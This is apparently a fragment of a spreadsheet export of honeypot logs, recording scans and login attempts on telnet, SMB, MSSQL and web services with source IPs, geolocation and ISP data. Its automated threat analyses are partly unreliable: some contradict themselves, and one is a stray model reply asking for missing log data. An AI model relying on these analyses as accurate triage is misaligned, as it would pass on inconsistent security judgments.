    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:7db4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log entry indicates that there was no activity detected on the telnet service, suggesting it is idle or unaffected by malicious attempts._x000a_There are no login attempts or connections made to this port so far, which is unusual compared to other ports being targeted._x000a_Malicious actors often target telnet for brute-force attacks. &amp;&amp; Telnet service is being accessed but there's no activity recorded, suggesting potential reconnaissance or probing attempts. _x000a_This could be an attacker checking for vulnerable systems before launching a full-scale attack. _x000a_The lack of actual data sent over telnet implies the attacker may be using scanning tools to identify potential entry points."/>
    <m/>
  </r>
  <r>
    <x v="758"/>
    <x v="758"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:18:40"/>
    <d v="2023-07-26T11:13:48"/>
    <d v="2025-04-26T13:18:40"/>
    <n v="4880"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;50464&amp;&amp;22&amp;&amp;103&amp;&amp;1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Secunderabad"/>
    <s v="1256922"/>
    <s v="500003"/>
    <s v="17.4399"/>
    <s v="78.4983"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="ACT Fibernet"/>
    <s v="residential"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="2010-12-06"/>
    <s v="ACTFIBERNET-Secundrabad"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (49.206.253.225,49709)}&amp;&amp;{Data_SMB:Incoming connection (49.206.253.225,49986)}&amp;&amp;{Data_SMB:Incoming connection (49.206.253.225,52327)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31ce:fde1"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This log indicates an attempt to access Microsoft SQL Server services without specifying credentials. It suggests a potential brute-force attack or password guessing attempt. The lack of specified credentials is unusual and may indicate malicious intent."/>
    <m/>
  </r>
  <r>
    <x v="759"/>
    <x v="759"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:15:33"/>
    <d v="2025-04-26T13:11:45"/>
    <d v="2025-04-26T13:15:33"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AE"/>
    <s v="United Arab Emirates"/>
    <s v="AZ"/>
    <s v="Abu Dhabi"/>
    <s v="Abu Dhabi"/>
    <s v="Abu Dhabi"/>
    <s v="292968"/>
    <s v="NA"/>
    <s v="24.4539"/>
    <s v="54.3773"/>
    <s v="15802"/>
    <s v="Emirates Integrated Telecommunications Company PJSC"/>
    <s v="Emirates Integrated Telecommunications Company PJSC"/>
    <s v="business"/>
    <s v="Emirates Integrated Telecommunications Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}&amp;&amp;{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/27.0 Chrome/125.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5ecc:97c4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="An attempt to login with a potentially fake user agent was made from a Windows 10 machine. The browser type and version are also suspiciously high and outdated, suggesting the possibility of automation. This could be an attempt to evade detection or bypass security measures. &amp;&amp; An unknown user is attempting to access a login page on the monitored system using an Android device with a modified browser configuration. The browser's User Agent string suggests a potential spoofing or hiding of true browser identity. The device appears to be running an older version of Chrome. &amp;&amp; A user is attempting to log in using a fake browser string and an older version of Chrome on a mobile device to potentially exploit vulnerabilities or bypass login protections. This may be a tactic used by malicious actors to gain unauthorized access to a system. The use of an outdated browser version raises suspicions about the authenticity of the user's identity."/>
    <m/>
  </r>
  <r>
    <x v="760"/>
    <x v="760"/>
    <s v="51-159-101-215.rev.poneytelecom.eu&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:12:49"/>
    <d v="2023-11-28T01:04:28"/>
    <d v="2025-04-26T13:12:49"/>
    <n v="227"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SOCKS5_H10"/>
    <s v="8443&amp;&amp;33752&amp;&amp;1080"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="IDF"/>
    <s v="Île-de-France"/>
    <s v="Paris"/>
    <s v="Paris"/>
    <s v="2988507"/>
    <s v="75008"/>
    <s v="48.8714"/>
    <s v="2.32141"/>
    <s v="12876"/>
    <s v="ONLINE S.A.S."/>
    <s v="SCALEWAY"/>
    <s v="hosting"/>
    <s v="ONLINE"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="nsd.scaleway.com_x000a_        nsc.scaleway.com_x000a_        nsa.scaleway.com_x000a_        nsb.online.net_x000a_        nsa.online.net_x000a_        nsb.scaleway.com_x000a__x000a_Please visit www.eurid.eu for more info."/>
    <s v="Scaleway SAS"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:339f:65d7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious activity: Attempt to establish an unauthorized connection using SOCKS5 protocol, which is often used for proxying or anonymization. This could be indicative of an attempt to bypass security measures or hide the true source of a malicious request. The absence of specific data suggests that this attempt was likely unsuccessful or blocked."/>
    <m/>
  </r>
  <r>
    <x v="761"/>
    <x v="761"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:07:06"/>
    <d v="2023-09-07T22:41:00"/>
    <d v="2025-04-26T13:07:06"/>
    <n v="843"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21&amp;&amp;3306&amp;&amp;44456&amp;&amp;1521&amp;&amp;1080&amp;&amp;6379&amp;&amp;5900&amp;&amp;60707&amp;&amp;NA&amp;&amp;5432&amp;&amp;143&amp;&amp;44704&amp;&amp;123&amp;&amp;110&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="NA"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20876"/>
    <s v="106.846"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="Ucloud Information Technology (hk) Limited"/>
    <s v="1992-01-10"/>
    <s v="UCLOUD-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_NTP:{'mode': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (152.32.153.228,60806)}&amp;&amp;{Data_SMB:Incoming connection (152.32.153.228,46108)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9820:99e4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity: A suspicious incoming SMB connection from an unknown IP address attempting to access the system. This could be an attempt to exploit vulnerabilities or spread malware. It may also indicate unauthorized access attempts. &amp;&amp; An incoming connection from an unknown IP address is attempting to access shared files or resources. This could be an attempt at unauthorized file transfer or accessing sensitive information. The nature of the activity suggests a potential attack on data confidentiality. &amp;&amp; The data indicates an incoming unauthorized connection to a shared resource, potentially from an external IP address, suggesting a potential security breach attempt through network sharing. The attacker is trying to gain access to the system's resources by connecting to it. This could be a precursor to a malicious file transfer or data theft. &amp;&amp; A suspicious incoming connection from an external IP address has been detected to a service that handles shared file and printer access. The IP address 152.32.153.228 attempted to initiate a connection on the SMB port, potentially trying to exploit vulnerabilities or gain unauthorized access. This could be an attempt at malicious data transfer or system compromise."/>
    <s v="Scanning SMB &amp;&amp; Port scan &amp;&amp; Port Scan &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="762"/>
    <x v="762"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:02:55"/>
    <d v="2025-04-25T21:24:15"/>
    <d v="2025-04-26T13:02:55"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:6a90"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected for TELNET service as indicated by 'NA' status, suggesting no malicious attempts or connections attempted via this service. &amp;&amp; No malicious activity detected in TELNET service, as the log indicates &quot;Not Available&quot; (NA). This suggests no attempts to connect or communicate through TELNET during this monitoring period. No alerts triggered for TELNET-related threats. &amp;&amp; The presence of this log indicates that there was an attempted connection to a telnet service, likely as part of reconnaissance or initial exploitation phase by a malicious actor. This could be a prelude to further attempts to gain unauthorized access to the system. The attempt itself may not have been successful but warrants further investigation."/>
    <s v="Port Scanning"/>
  </r>
  <r>
    <x v="763"/>
    <x v="763"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T13:01:43"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-26T13:01:43"/>
    <n v="103"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H17&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_DNS_H4&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_DHCP_H15&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;42499&amp;&amp;53&amp;&amp;14265&amp;&amp;1433&amp;&amp;67&amp;&amp;62437&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JT"/>
    <s v="Central Java"/>
    <s v="Rembang Regency"/>
    <s v="Jadi"/>
    <s v="8061009"/>
    <s v="NA"/>
    <s v="-6.77263"/>
    <s v="111.275"/>
    <s v="149943"/>
    <s v="PT Ayodya Data Internusa"/>
    <s v="PT Ayodya Data Internusa"/>
    <s v="residential"/>
    <s v="PT Ayodya Data Internusa"/>
    <s v="2022-07-25"/>
    <s v="IDNIC-ADINET-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,57464)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,57748)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,56555)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,49306)}&amp;&amp;{Data_SMB:Incoming connection (103.191.254.131,50106)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67bf:fe83"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="764"/>
    <x v="764"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T12:58:11"/>
    <d v="2025-03-10T11:19:53"/>
    <d v="2025-04-26T12:58:11"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Bondowoso"/>
    <s v="Tlogosari"/>
    <s v="6829676"/>
    <s v="NA"/>
    <s v="-7.9993"/>
    <s v="113.935"/>
    <s v="150208"/>
    <s v="PT Internusa Duta Makmur"/>
    <s v="PT Internusa Duta Makmur"/>
    <s v="business"/>
    <s v="PT Internusa Duta Makmur"/>
    <s v="2022-08-24"/>
    <s v="IDNIC-IDMNET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.160.182.124,63359)}&amp;&amp;{Data_SMB:Incoming connection (103.160.182.124,64190)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a0:b67c"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <s v="Portscan &amp;&amp; SMB Attack"/>
  </r>
  <r>
    <x v="765"/>
    <x v="765"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T12:26:43"/>
    <d v="2025-04-26T12:26:43"/>
    <d v="2025-04-26T12:26:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Hooghly"/>
    <s v="Gangadharpur"/>
    <s v="8985894"/>
    <s v="712306"/>
    <s v="22.76"/>
    <s v="88.22"/>
    <s v="23860"/>
    <s v="ALLIANCE-GATEWAY-AS-AP"/>
    <s v="Alliance Broadband Services"/>
    <s v="consumer"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73bb:28cc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown access attempt to Microsoft SQL Server database, potentially for unauthorized data extraction or modification. The system is indicating no activity due to an unknown reason. A possible security vulnerability exists if the server's access credentials are exposed. &amp;&amp; This suggests an attempt to access or exploit Microsoft SQL Server functionality without being properly authorized or configured._x000a_ The activity appears to be related to database-related malicious activity, possibly involving unauthorized access or attempts to escalate privileges._x000a_ This could indicate a potential vulnerability in the system or misuse of existing accounts."/>
    <m/>
  </r>
  <r>
    <x v="766"/>
    <x v="766"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T12:04:59"/>
    <d v="2025-04-26T12:04:59"/>
    <d v="2025-04-26T12:04:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d2:b40c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected for telnet service as log indicates &quot;NA&quot; (Not Applicable). No incoming or outgoing connections reported. Service appears to be inactive or not monitored. &amp;&amp; The data indicates an attempt to connect to the TELNET service, but no login credentials were provided or the connection was terminated before authentication could be completed. This is likely a port scan or reconnaissance activity. The attacker may have been probing for vulnerabilities or searching for open services."/>
    <s v="Port Scan &amp;&amp; Port Scanning"/>
  </r>
  <r>
    <x v="767"/>
    <x v="767"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T11:25:18"/>
    <d v="2025-04-26T11:25:18"/>
    <d v="2025-04-26T11:25:18"/>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d6:4d62"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No attempt made to access TELNET service. This indicates no malicious activity was detected for this service. No unusual traffic was logged for TELNET connections. &amp;&amp; This log indicates an attempt to connect using the Telnet service but was unsuccessful. The connection attempt is likely malicious, possibly an unauthorized access attempt. No further action was taken as the login attempt failed."/>
    <m/>
  </r>
  <r>
    <x v="768"/>
    <x v="768"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T11:10:35"/>
    <d v="2025-01-07T21:29:45"/>
    <d v="2025-04-26T11:10:35"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H22"/>
    <s v="80&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="48"/>
    <s v="Gyeongsangnam-do"/>
    <s v="Miryang-si"/>
    <s v="Miryang-si (Naei-dong)"/>
    <s v="1841147"/>
    <s v="NA"/>
    <s v="35.4992"/>
    <s v="128.741"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79b0:32b6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This indicates a potential web scanning activity, likely for exploitation or vulnerability assessment, as the user-agent is curl and the request is to the root directory of a server._x000a_The use of '*' in the Accept header suggests an attempt to identify supported content types._x000a_A malicious actor may be probing the server for vulnerabilities. &amp;&amp; A malicious agent is accessing the server with an unknown host, using a generic user-agent and attempting to retrieve the root directory of the service. This could be an attempt to scan or exploit the system for vulnerabilities. The request appears to come from an external IP address. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No malicious activity detected, insufficient log data provided. _x000a_This suggests that either the system is not capturing logs or there has been no recent suspicious behavior recorded. _x000a_In this case, it's difficult to make any conclusions about potential threats. &amp;&amp; There is insufficient data provided for analysis, no specific log data has been given."/>
    <s v="I need log data to analyze and provide an answer. Please provide the log data, and I'll be happy to help!"/>
  </r>
  <r>
    <x v="769"/>
    <x v="769"/>
    <s v="NA&amp;&amp;adsl196-151-225-206-196.adsl196-8.iam.net.ma"/>
    <x v="0"/>
    <d v="2025-04-26T11:10:11"/>
    <d v="2023-07-31T18:57:51"/>
    <d v="2025-04-26T11:10:11"/>
    <n v="1265"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_MSSQL_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;631&amp;&amp;443&amp;&amp;22&amp;&amp;1080&amp;&amp;3306&amp;&amp;80&amp;&amp;5900&amp;&amp;9100&amp;&amp;6379&amp;&amp;30472&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="MA"/>
